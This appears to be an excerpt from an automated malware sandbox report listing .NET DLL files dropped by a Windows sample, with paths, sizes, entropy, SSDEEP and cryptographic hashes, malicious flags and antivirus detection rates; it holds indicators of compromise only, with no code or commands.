                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 38%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):40448
                                                        Entropy (8bit):5.7028690200758465
                                                        Encrypted:false
                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24576
                                                        Entropy (8bit):5.535426842040921
                                                        Encrypted:false
                                                        SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                        MD5:5420053AF2D273C456FB46C2CDD68F64
                                                        SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                        SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                        SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 13%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):6.057993947082715
                                                        Encrypted:false
                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):40448
                                                        Entropy (8bit):5.7028690200758465
                                                        Encrypted:false
                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):40448
                                                        Entropy (8bit):5.7028690200758465
                                                        Encrypted:false
                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):22016
                                                        Entropy (8bit):5.41854385721431
                                                        Encrypted:false
                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):64000
                                                        Entropy (8bit):5.857602289000348
                                                        Encrypted:false
                                                        SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                        MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                        SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                        SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                        SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):40448
                                                        Entropy (8bit):5.7028690200758465
                                                        Encrypted:false
                                                        SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                        MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                        SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                        SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                        SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 12%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):50176
                                                        Entropy (8bit):5.723168999026349
                                                        Encrypted:false
                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):70144
                                                        Entropy (8bit):5.909536568846014
                                                        Encrypted:false
                                                        SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                        MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                        SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                        SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                        SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):41472
                                                        Entropy (8bit):5.6808219961645605
                                                        Encrypted:false
                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.629584586954759
                                                        Encrypted:false
                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 13%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36352
                                                        Entropy (8bit):5.668291349855899
                                                        Encrypted:false
                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.629584586954759
                                                        Encrypted:false
                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 13%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 24%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):50176
                                                        Entropy (8bit):5.723168999026349
                                                        Encrypted:false
                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):22016
                                                        Entropy (8bit):5.41854385721431
                                                        Encrypted:false
                                                        SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                        MD5:BBDE7073BAAC996447F749992D65FFBA
                                                        SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                        SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                        SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):50176
                                                        Entropy (8bit):5.723168999026349
                                                        Encrypted:false
                                                        SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                        MD5:2E116FC64103D0F0CF47890FD571561E
                                                        SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                        SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                        SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38400
                                                        Entropy (8bit):5.699005826018714
                                                        Encrypted:false
                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                        MD5:87765D141228784AE91334BAE25AD743
                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):5.645950918301459
                                                        Encrypted:false
                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                        Malicious:true
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):36352
                                                        Entropy (8bit):5.668291349855899
                                                        Encrypted:false
                                                        SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                        MD5:94DA5073CCC14DCF4766DF6781485937
                                                        SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                        SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                        SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38912
                                                        Entropy (8bit):5.679286635687991
                                                        Encrypted:false
                                                        SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                        MD5:9E910782CA3E88B3F87826609A21A54E
                                                        SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                        SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                        SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):342528
                                                        Entropy (8bit):6.170134230759619
                                                        Encrypted:false
                                                        SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                        MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                        SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                        SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                        SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                        Malicious:true
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.660491370279985
                                                        Encrypted:false
                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                        MD5:240E98D38E0B679F055470167D247022
                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
